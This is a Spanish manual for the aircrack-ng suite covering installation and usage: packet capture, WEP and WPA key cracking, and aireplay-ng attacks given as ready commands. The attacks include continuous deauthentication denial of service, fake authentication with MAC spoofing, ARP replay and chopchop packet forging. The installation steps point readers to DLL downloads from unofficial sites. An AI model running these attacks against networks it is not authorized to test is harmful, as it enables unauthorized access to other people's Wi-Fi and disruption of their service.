Manual en español suite aircrack-ng

Tutorial Manual Aircrack Windows

Instalación
Manual Tutorial Aircrack Windows, antes de comenzar con este tutorial de cómo
instalar aircrack bajo windows, debo avisar que tan sólo hay un número limitado de tarjetas
que funcionan con este método,

puedes comprobar si tu tarjeta es compatible en la siguiente página : Tarjetas Aircrack

Aircrack-ng es una suite de seguridad wifi, que posee una amplia gama de herramientas
para la desencriptación de redes inalámbricas protegidas. Entre las herramientas que se
incluyen en esta suite, se encuentran Airodump, Aireplay, o WzCook entre otros. Aircrack
en windows no funciona de manera nativa y es necesaria la librería cygwin que emula las
funciones POSIX de Linux. Para instalar aircrack, tan sólo necesitaríamos la librería
cygwin, bajarse la última versión de aircrack, los drivers que nos permitirán poner nuestra
tarjeta wifi en modo monitor ( Airopeek ) y ponerlo todo junto. A continuación detallamos
los pasos de insalación de Aircrack Windows en este manual de 4 sencillos pasos.

1. Bájate la última versión estable de Aircrack-ng para Windows desde aquí :

Descargar Aircrack
2. Después consigue el fichero cygwin1.ddl desde http://www.dll-files.com

3. Descárgate los 3 ficheros Peek.dll, Peek5.sys y msvcr70.dll desde http://www.tuto-

fr.com/tutoriaux/crack-wep/fichiers/wlan/winxp/Peek.zip
4. Extrae el zip y copia los ficheros dll que te has descargado en el directorio donde
descomprimiste aircrack.
5. Hecho!

imagen:
Descargar Aircrack NG ( Windows, Linux
y Zaurus )
Aircrack-ng es la suite de ataque a encriptaciones Wi-Fi por excelencia. La suite Aircrack-
ng incluye diversas herramientas para poder conseguir las contraseñas de redes protegidas
con protocolos WEP o WPA. Entre las herramientas que incluye la suite Aircrack-ng están
Airodump, Aireplay, WzCook..

Todas ellas especializadas en algún ámbito o tarea en el proceso de crackeo de una red wifi
con protección criptográfica. Aircrack-ng está disponible tanto para Windows como para
Linux, aunque ya no se da soporte para las nuevas versiones de Aircrack-ng bajo Windows.
Para hacer funcionar correctamente Aircrack, necesitáis una tarjeta wifi compatible con
aircrack-ng, esto es, para la que existan unos drivers que permitan ponerla en modo monitor
y la inyección de tráfico en caso de que queramos acelerar la ruptura WEP. Podéis
consultar la lista de tarjetas compatibles en el siguiente enlace : Tarjetas compatibles
Aircrack-NG

Crackear WEP con Aircrack-ng

La obtención de una clave WEP con Aircrack en una red protegida, es una tarea
relativamente sencilla. La ruptura del protocolo WEP se basa en la recolección de IVs
( Vectores de Inicialización ) que son utilizados por el cifrado de stream RC4 como parte de
la clave utilizada durante el cifrado de cada paquete. Diversos estudios como este WEP
RC4 entre otros, han demostrado las vulnerabilidades estadísticas derivadas de las
implementaciones de RC4 por los fabricantes. Estas vulnerabilidades se basan en el análisis
estadístico de los anteriormente mencionados vectores de inicialización que se encuentran
en las tramas de datos cifradas con WEP. Cuantos más IVs tengamos, más probabilidad de
conseguir ciertos IVs especiales, también denominados débiles, que nos proporcionará la
información necesaria ( en este caso se la proporcionará a Aircrack-ng ) para poder obtener
la clave WEP.

Crackear WPA con Aircrack-ng

La ruptura de WPA es un proceso más artesanal y difícil. Aircrack-ng tan sólo puede
realizar ataques por fuerza bruta utilizando diccionarios contra WPA, por lo tanto estamos
dependiendo de la fortaleza de la clave a crackear ( longitud, caracteres utilizados.. ).
Existen dos modalidades básicas de WPA, WPA-PSK y WPA-Radius. WPA-PSK se basa
en el establecimiento de una clave pre compartida entre el punto de acceso y el usuario. Es
la utilizada en los hogares y dependiendo de la contraseña que haya utilizado el usuario,
puede romperse relativamente temprano. WPA-Radius por otro lado, es prácticamente
imposible de crackear por fuerza bruta, sería necesario algún otro tipo de ataque ( Rogue
Radius, Ataques LEAP.. ) ya que la clave se genera para cada sesión y es fuerte, ya que la
genera el autenticador Radius.
Aircrack NG 0.93 Windows:

Aircrack NG 0.93 Windows

Aircrack NG 1.0 rc3 Linux:

Aircrack NG 1.0 rc3 Linux

Aircrack NG 1.0 Zaurus ARM

Aircrack NG 1.0 Zaurus ARM

imagen:
Airodump-ng
Descripción

Airodump-ng se usa para capturar paquetes wireless 802.11 y es útil para ir acumulando
vectores de inicialización IVs con el fin de intentar usarlos con aircrack-ng y obtener la
clave WEP. Si tienes un receptor GPS conectado al ordenador, airodump-ng es capaz de
mostrar las coordenadas de los puntos de acceso que vaya encontrando.

Uso

Antes de ejecutar airodump-ng, tienes que mirar con el script airmon-ng la lista de tus
interfaces wireless detectadas. Es posible, pero no recomendable, ejecutar Kismet y
airodump-ng al mismo tiempo.

uso: airodump-ng <opciones> <interface>[,<interface>,...]

Opciones:
--ivs : Graba únicamente los IVs capturados
--gpsd : Usa GPSd
--w <nombre archivo>: Nombre del archivo donde guardar las capturas
-write : Lo mismo que --w
--beacons : Guardar todas las balizas o beacons en el
archivo
--netmask <máscara de red> : Filtrar APs por máscara
--bssid <bssid> : Filtrar APs por BSSID

Por defecto, airodump-ng va saltando alrededor de los canales 2.4Ghz.

Puedes capturar en un canal específico usando:
--channel <canal>: Capturar en un canal específico
--band <abg> : Banda en la que actuará airodump-ng
--cswitch <método> : Saltar de canal con este método:
0 : FIFO (opción por defecto)
1 : Round Robin
2 : Saltar al último
-s : Lo mismo que --cswitch

Puedes convertir archivos .cap / .dump a formato .ivs o juntarlos.

Pistas de uso

¿Cual es el significado de los datos mostrados por

airodump-ng?

airodump-ng nos mostrará una lista de los puntos de acceso detectados, y también una lista
de los clientes conectados (“stations”). Como ejemplo puedes ver la siguiente captura de
pantalla:
 CH 9 ][ Elapsed: 4 s ][ 2007-02-25 16:47

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER

AUTH ESSID

00:09:5B:1C:AA:1D 11 16 10 0 0 11 54. OPN

NETGEAR
00:14:6C:7A:41:81 34 100 57 14 1 9 11 WEP WEP
bigbear

BSSID STATION PWR Lost Packets Probes

00:14:6C:7A:41:81 00:0F:B5:32:31:31 51 2 14
(not associated) 00:14:A4:3F:8D:13 19 0 4 mossy
00:14:6C:7A:41:81 00:0C:41:52:D1:D1 -1 0 5
Field Descripción

BSSID Dirección MAC del punto de acceso.

Nivel de señal. Su significado depende del driver que usemos, pero

cuanto mayor sea el PWR más cerca estaremos del AP o del cliente. Si
el PWR es -1, significa que el driver no soporta la detección del nivel de
señal. Si el PWR es -1 para algunos clientes (stations) es porque los
PWR paquetes proceden del AP hacia el cliente pero las transmisiones del
cliente se encuentran fuera del rango de cobertura de tu tarjeta. Lo que
significa que solo escuchas la mitad de la comunicación. Si todos los
clientes tienen PWR -1 significa que el driver no tiene la cpacidad de
detectar el nivel de señal.

Calidad de recepción calculada a través del porcentaje de paquetes

RXQ (management y paquetes de datos) recividos correctamente en los
últimos 10 segundos. Mira la nota para una explicación más detallada.

Número de “paquetes anucio” o beacons enviadas por el AP. Cada

Beacon punto de acceso envia alrededor de diez beacons por segundo cuando
s el rate o velocidad es de 1M, (la más baja) de tal forma que se pueden
recibir desde muy lejos.

Número de paquetes de datos capturados (si tiene clave WEP, equivale

# Data tambien al número de IVs), incluyendo paquetes de datos broadcast
(dirigidos a todos los clientes).

Número de paquetes de datos capturados por segundo calculando la

#/s
media de los últimos 10 segundos.

Número de canal (obtenido de los “paquetes anuncio” o beacons).

Nota: Algunas veces se capturan paquetes de otros canales, incluso si
CH
airodump-ng no está saltando de canal en canal, debido a interferencias
o solapamientos en la señal.
 Velocidad máxima soportada por el AP. Si MB = 11, es 802.11b, si MB =
22es 802.11b+ y velocidades mayores son 802.11g. El punto (despues
MB
del 54) indica que esa red soporta un preámbulo corto o “short
preamble”.

Algoritmo de encriptación que se usa. OPN = no existe encriptación

(abierta),”WEP?” = WEP u otra (no se han capturado suficientes
ENC paquetes de datos para saber si es WEP o WPA/WPA2), WEP (sin el
interrogante) indica WEP estática o dinámica, y WPA o WPA2 en el caso
de que se use TKIP o CCMP.

CIPHER Detector cipher. Puede ser CCMP, WRAP, TKIP, WEP, WEP40, o WEP104.

El protocolo de autenticación usado. Puede ser MGT, PSK (clave

AUTH
precompartida), o OPN (abierta).

Tambien llamado “SSID”, que puede estar en blanco si la ocultación del

SSID está activada en el AP. En este caso, airodump-ng intentará
ESSID
averiguar el SSID analizando paquetes “probe responses” y “association
requests” (son paquetes enviados desde un cliente al AP).

Dirección MAC de cada cliente asociado. En la captura de pantalla,

STATIO
vemos que se han detectado dos clientes (00:09:5B:EB:C5:2B y
N
00:02:2D:C1:5D:1F).

Lost El número de paquetes perdidos en los últimos 10 segundos.

Packet
El número de paquetes de datos enviados por el cliente.
s

Probes Los ESSIDs a los cuales ha intentado conectarse el cliente.

NOTAS:

RXQ: Se calcula a partir de los paquetes de datos y management. Supongamos que tienes
100% de RXQ y recibes 10 (o cualquier otra cantidad) beacons por segundo. Ahora de
repente el RXQ baja a 90, pero todavía capturas las mismas beacons. Esto significa que el
AP está enviando paquetes a un cliente pero no puedes escuchar o capturar los paquetes que
salen del cliente hacia el AP (necesitas acercarte más al cliente). Otra situación puede ser,
que tengas una tarjeta de 11MB (por ejemplo una prism2.5) y estes cerca del AP. Pero el
AP está configurado en modo únicamente de 54MBit y tambien el RXQ disminuye, en este
caso sabrás que hay conectado al menos un cliente a 54MBit.
Problemas de uso

airodump-ng cambia entre WEP y WPA

Esto ocurre porque tu driver no descarta los paquetes corruptos (que tienen un CRC
inválido). Si es una ipw2100 (Centrino b), no tiene solución; por lo que deberías comprar
una tarjeta mejor. Si es una Prism2, prueba a actualizar el firmware. En la sección de
tutorials tienes un manual en castellano de como actualizar el firmware Prism.

airodump-ng no muestra ningún dato

Con el driver madwifi-ng asegúrate de que no hay otras VAPs activas. Hay problemas
cuando se crea una nueva VAP en modo monitor y ya había otra VAP en modo managed.

Tienes que parar primero ath0 y despues iniciar wifi0:

airmon-ng stop ath0

airmon-ng start wifi0

wlanconfig ath0 destroy

wlanconfig ath create wlandev wifi0 wlanmode monitor
aircrack-ng
aircrack-ng [opciones] <archivo(s) de captura>

Los archivo(s) de captura pueden estar en formato cap o ivs.

-a
amode
Fuerza el tipo de ataque (1 = WEP estática, 2 = WPA-PSK).

-e
essid
Si se especifica, se usarán todos los IVs de las redes con el mismo ESSID. Esta opción es
necesaria en el caso de que el ESSID no esté abiertamente difundido en una recuperación
de claves WPA-PSK (ESSID oculto).

-b
bssid
Selecciona la red elegida basándose en la dirección MAC.

-p
nbcpu
En sistemas SMP , especifica con esta opción el número de CPUs.

-q
Activa el modo silencioso (no muestra el estado hasta que la clave es o no encontrada).

-c
(recuperación WEP) Limita la búsqueda a caracteres alfanuméricos sólamente (0x20 -
0x7F).

-t
(recuperación WEP) Limita la búsqueda a los caracteres hexa decimales codificados en
binario.
-h
(recuperación WEP) Limita la búsqueda a los caracteres numericos (0×30-0×39)
Estas contraseñas son usadas por defecto en la mayoría de las Fritz!BOXes (routers
configurados por defecto).

-d
start
(recuperación WEP) Especifica el comienzo de la clave WEP (en hex), usado para
depuración.

-m
maddr
(recuperación WEP) Dirección MAC para la que filtrar los paquetes de datos WEP.
Alternativamente, especifica -m ff:ff:ff:ff:ff:ff para usar todos y cada uno de los IVs,
indiferentemente de la red que sea.

-n
nbits
(recuperación WEP) Especifica la longitud de la clave: 64 para WEP de 40-bit , 128 para
WEP de 104-bit , etc. El valor predeterminado es 128.

-i
index
(recuperación WEP) Conserva sólo los IVs que tienen este índice de clave (1 a 4).
El comportamiento predeterminado es ignorar el índice de la clave.

-f
fudge
(recuperación WEP) De forma predeterminada, este parámetro está establecido en 2 para
WEP de 104-bit y en 5 para WEP de 40-bit.
Especifica un valor más alto para elevar el nivel de fuerza bruta: la recuperación de claves
llevará más tiempo, pero con una mayor posibilidad de éxito.

-k
korek
(recuperación WEP) Hay 17 ataques de tipo estadístico de korek. A veces un ataque crea
un enorme falso positivo que evita que se obtenga la clave, incluso con grandes cantidades
de IVs. Prueba -k 1, -k 2, ... -k 17 para ir desactivando cada uno de los ataques de forma
selectiva.
-x ó -x0
(recuperación WEP) No aplicar fuerza bruta sobre los dos últimos keybytes.

-x1
(recuperación WEP) Aplicar fuerza bruta sobre el último keybyte.

-x2
(recuperación WEP) Aplicar fuerza bruta sobre los dos últimos keybytes.

-X
No aplicar fuerza bruta multiproceso (En sistemas SMP).

-y
(recuperación WEP) Éste es un ataque de fuerza bruta experimental único que debería ser
usado cuando el método normal de ataque falle con más de un millón de IVs.

-s
(recuperación WEP) Mostrar la clave en formato ASCII.

-z
(recuperación WEP) Opción de ataque PTW (Solo funciona bajo archivos .cap)

-w
words
(recuperación WPA) Ruta hacia la lista de palabras o “-” sin comillas para
utilizar complementos de tipo (fuerza bruta).

ivstools

Esta es una utilidad muy buena ya que sirve para:

1º)unir archivos ivs en uno solo usamos el siguiente comando:

ivstools --merge captura1.ivs captura2.ivs captura3.ivs archivofinal.ivs

siendo captura(s) los archivos que queremos unir y archivofinal el que nos generara como
unión de los anteriores

2º)Para convertir un archivo con extensión cap en ivs:

ivstools --captura.cap archivofinal.ivs

makeivs

Es una utilidad que nos permite crear un archivo con extensión ivs con la clave que
nosotros le añadamos (es solo para hacer pruebas no sirve para nada mas)

makeivs.exe captura.ivs 866578388f517be0b4818a0db1

siendo captura el archivo inventado y 866578388f517be0b4818a0db1la clave inventada

Airmon-ng

Sirve para poner nuestra tarjeta en modo monitor antes de empezar a capturar trafico
debemos poner nuestra tarjeta en modo monitor usando este script para ello tecleamos:

airmon-ng <start/stop> <dispositivo> [canal]

start: para activar el modo monitor.

stop: para parar el modo monitor.
dispositivo: nuestra tarjeta (ath0, eth0, raw0.....)

Airodump-ng

Descripción

Se usa para capturar datos trasmitidos a través del protocolo 802.11 y en particular para la
captura y recolección de IVs (vectores iniciales) de los paquetes WEP con la intención de
usar aircrack-ng. Si existe un receptor GPS conectado al ordenador airodump-ng muestra
las coordenadas del AP.

Uso

Antes de usarlo debes haber iniciado el script airmon-ng para que se muestren los
dispositivos wireless que posees y para activar el modo monitor. Puedes, pero no se
recomienda que ejecutes Kismet y airodump al mismo tiempo.
airodump-ng [opcione(s)] <dispositivo>

OPCIONES:

--ivs: Captura solo ivs

--gpsd: Para usar un dispositivo Gps
--write <nombre del archivo a guardar> :crea un archivo del nombre que le hallamos
puestos y con la extensión(.cap ó .ivs) y empieza a capturar.
-w: es lo mismo que poner write
--beacons: Guarda los beacons, por defecto no los guarda.

Por defecto airodump captura todos los canales que se encuentren dentro de la
frecuencia 2,4 GHz.

--channel :Captura el canal especificado

-c: Lo mismo que escribir channel
-a: Captura en la frecuencia de 5Ghz especifica del canal a
-abg: Captura tanto en frecuencias de 2,4Ghz como en 5 Ghz

Para configurar correctamente los comandos debemos seguir el orden en el que están
escritos en este texto y omitir el comando que no deseemos modificar:

Ejemplos:

airodump-ng --ivs -w prueba -c 11 -abg ath0

capturaría solo ivs creando un archivo llamado prueba en el canal 11 tanto en a/b/g

airodump-ng -w prueba -c 11 -abg ath0

capturaría creando un archivo cap llamado prueba en el canal 11 tanto en a/b/g

*Airodump oscila entre WEP y WPA.

Esto ocurre cuando tu controlador no desecha los paquetes corruptos (los que tienen CRC
inválido). Si es un ipw2100 (Centrino b), simplemente no tiene arreglo; ve y compra una
tarjeta mejor. Si es una Prism2, prueba a actualizar el firmware.

*¿ Cuál es el significado de los campos mostrados por airodump-ng ?

airodump-ng mostrará una lista con los puntos de acceso detectados, y también una lista de
clientes conectados o estaciones ("stations").
Aireplay-ng

Se pueden realizar 5 ataques diferentes:

Ataque 0: Desautentificación
Ataque 1: Autentificación falsa
Ataque 2: Selección interactiva del paquete a enviar
Ataque 3: Reinyección de petición ARP
Ataque 4: El "chopchop" de KoreK (predicción de CRC)

Ataque 0: Desautentificación
Este ataque se puede utilizar para varios propósitos:

*Capturar el WPA Handshake

Para ello debemos poner el siguiente comando:

aireplay-ng -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0

0 significa desautentificación de cliente sirve para que se vuelva a asociar, vaciando de esta
forma el cache ARP y por lo tanto volviendo a enviar su handshake.

-a 00:13:10:30:24:9C Seria el AP

-c 00:09:5B:EB:C5:2B Seria una Station asociada a esa AP. Si omitimos esta ultima parte
el ataque se realiza sobre todos las Station conectadas a ese AP.

ath0 Es nuestra tarjeta según los diversos modelos de tarjeta (chip) varia wlan0, eth0, ra0....

*Reinyección ARP

aireplay-ng -0 10 -a 00:13:10:30:24:9C ath0

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B ath0

como podemos observar el primer comando es una desautentificación seguida de una

reinyección de los paquetes obtenidos se supone que al haber vaciado la cache del cliente y
volverse a conectar vuelve a enviar la contraseña
-b 00:13:10:30:24:9C Seria el AP
-h 00:09:5B:EB:C5:2B Seria el cliente

*Denegación del servicio a clientes conectados

Se basa en el envió continuo de paquetes de desautentificación con la consiguiente

imposibilidad del(os) cliente(s) de conectarse.

aireplay-ng -0 0 -a 00:13:10:30:24:9C ath0

0 hace que envié paquetes continuamente a cualquier Station conectado a ese AP si solo
queremos uno en particular enviaríamos con el comando:

aireplay-ng -0 0 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0

Ataque 1: Autentificación falsa

Este ataque es solamente exitoso cuando necesitamos un cliente asociado al AP para

realizar los ataques 2, 3, 4 (-h opción) y no lo tenemos. Por lo tanto consiste en crear
nosotros mismos un cliente que se asociara a ese AP .Hay que recordar llegando a este
punto que siempre será mejor un cliente verdadero ya que el falso no genera trafico ARP.

Se recomienda que antes de realizar este ataque cambiemos nuestra dirección MAC de la
tarjeta para que envié correctamente ACKs (peticiones).

ifconfig ath0 down

ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up

Una vez realizado esto lanzamos el ataque de la siguiente forma:

aireplay-ng -1 0 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful :-)

'the ssid' sin las comillas es el nombre del AP 00:11:22:33:44:55 Cliente falso

Con los CVS 2005-08-14 madwifi parcheados, es posible inyectar paquetes estando en
modo Infraestructura (la clave WEP en sí misma no importa, en tanto que el AP acepte
autenticación abierta). Por lo que, en lugar de usar el ataque 1, puedes sólo asociarte e
inyectar / monitorizar a través de la interfaz athXraw:

ifconfig ath0 down hw ether 00:11:22:33:44:55

iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA
ifconfig ath0 up

sysctl -w dev.ath0.rawdev=1
ifconfig ath0raw up
airodump-ng ath0raw out 6

Entonces puedes ejecutar el ataque 3 o el 4 (abajo, aireplay reemplazará automáticamente

ath0 por ath0raw):

aireplay-ng -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0

aireplay-ng -4 -h 00:10:20:30:40:50 -f 1 ath0

Este ataque mencionado anteriormente hay muchas veces que falla y no es 100%
seguro ya que ha sido probado por muchos de nosotros. El AP es cierto que escupe ivs
pero hay veces que al intentar sacar la clave descubrimos que la clave es la
introducida por nosotros por lo tanto no serviría de nada

Algunos puntos de acceso requieren de reautentificación cada 30 segundos, si no nuestro

cliente falso será considerado desconectado. En este caso utiliza el retardo de re-asociación
periódica:

aireplay-ng -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

si en vez de 30 segundos queremos 20 pues escribimos 20 si fuesen 10 modificamos por 10

y asi sucesivamente

Si este ataque parece fallar (aireplay permanece enviando paquetes de petición de

autenticación), puede que esté siendo usado un filtrado de direcciones MAC. Asegúrate
también de que:

Estás lo suficientemente cerca del punto de acceso, pero ojo no demasiado porque
también puede fallar.
El controlador está correctamente parcheado e instalado.
La tarjeta está configurada en el mismo canal que el AP.
El BSSID y el ESSID (opciones -a / -e) son correctos.
Si se trata de Prism2, asegúrate de que el firmware está actualizado.

Ataque 2: Selección interactiva del paquete a enviar

Este ataque te permite elegir un paquete dado para reenviarlo; a veces proporciona
resultados más efectivos que el ataque 3 (reinyección automática de ARP).

Podrías usarlo, por ejemplo, para intentar el ataque "redifundir cualesquiera datos", el cuál
sólo funciona si el AP realmente reencripta los paquetes de datos WEP:

aireplay-ng -2 -b 00:13:10:30:24:9C -n 100 -p 0841 -h 00:09:5B:EB:C5:2B -c

FF:FF:FF:FF:FF:FF ath0

También puedes usar el ataque 2 para reenviar manualmente paquetes de peticiones ARP
encriptadas con WEP, cuyo tamaño es bien 68 o 86 bytes (dependiendo del sistema
operativo):

aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -p 0841 -h

00:09:5B:EB:C5:2B ath0
aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 86 -n 86 -p 0841 -h
00:09:5B:EB:C5:2B ath0

Otra buena idea es capturar una cierta cantidad de trafico y echarle un ojo con
ethereal. Si creemos al examinar el trafico que hay dos paquetes que parecen una
petición y una respuesta (Un cliente envía un paquete y poco después el destinatario
responde a este) entonces es una buena idea intentar reinyectar el paquete petición
para obtener paquetes respuestas

Ataque 3: Reinyección de petición ARP

El clásico ataque de reinyección de petición ARP es el mas efectivo para generar nuevos
IVs, y funciona de forma muy eficaz. Necesitas o bien la dirección MAC de un cliente
asociado (00:09:5B:EB:C5:2B), o bien la de un cliente falso del ataque 1
(00:11:22:33:44:55). Puede que tengas que esperar un par de minutos, o incluso más, hasta
que aparezca una petición ARP; este ataque fallará si no hay tráfico.

Por favor, fíjate en que también puedes reutilizar una petición ARP de una captura anterior
usando el interruptor -r .

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...

El "chopchop" de KoreK (predicción de CRC)

Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin conocer la
clave. Incluso puede funcionar con WEP dinámica. Este ataque no recupera la clave WEP
en sí misma, sino que revela meramente el texto plano. De cualquier modo, la mayoría de
los puntos de acceso no son en absoluto vulnerables. Algunos pueden en principio parecer
vulnerables pero en realidad tiran los paquetes menores de 60 bytes. Si el AP tira paquetes
menores de 42 bytes aireplay trata de adivinar el resto de la información que le falta, tan
pronto como el encabezado se predecible. Si un paquete IP es capturado automáticamente
busca el checksum del encabezado
después de haber adivinado las partes que le faltaban. Este ataque requiere como mínimo
un paquete WEP (encriptado).

1. Primero, desencriptemos un paquete:

aireplay-ng -4 ath0
Si esto falla, es debido a que hay veces que el AP tira la información porque no sabe de que
dirección MAC proviene. En estos casos debemos usar la dirección MAC de un cliente que
este conectado y que tenga permiso (filtrado MAC activado).

aireplay-ng -4 -h 00:09:5B:EB:C5:2B ath0

2. Echemos un vistazo a la dirección IP:

tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

3. Ahora, forjemos una petición ARP.

La IP inicial no importa (192.168.1.100), pero la Ip de destino (192.168.1.2) debe

responder a peticiones ARP. La dirección MAC inicial debe corresponder a una estación
asociada.

arpforge-ng replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 00:09:5B:EB:C5:2B

192.168.1.100 192.168.1.2 arp.cap

4. Y reenviemos nuestra petición ARP forjada:

aireplay-ng -2 -r arp.cap ath0

Airdecap-ng

Sirve para desencriptar los paquetes capturados una vez obtenida la clave ya sea WEP o
WPA

airdecap-ng [opciones] <archivo pcap>

Ejemplos:

airdecap-ng -b 00:09:5B:10:BC:5A open-network.cap

airdecap-ng -w 11A3E229084349BC25D97E2939 wep.cap
airdecap-ng -e 'the ssid' -p passphrase tkip.cap

Wzcook

Sirve para recuperar las claves WEP de la utilidad de XP Wireless Zero Configuration. Éste
es un software experimental, por lo que puede que funcione y puede que no, dependiendo
del nivel de service pack que tengas.

WZCOOK mostrará el PMK (Pairwise Master Key), un valor de 256-bit que es el resultado
de codificar 8192 veces la contraseña junto con el ESSID y la longitud del ESSID. La
contraseña en sí no se puede recuperar -- de todos modos, basta con conocer el PMK para
conectar con una red inalámbrica protegida mediante WPA con wpa_supplicant (ver el
Windows README). Tu archivo de configuración wpa_supplicant.conf debería quedar
así:

network={
ssid="my_essid"
pmk=5c9597f3c8245907ea71a89d[...]9d39d08e

Si no usas WZC pero usas la utilidad USR, accede al registro:

HKey_Current_User/Software/ACXPROFILE/profilename/dot11WEPDefaultKey1

Cada versión y actualización incorpora una serie de mejoras y de diferencias de

argumentos, para cualquier duda acceder a: Nueva Generación Wireless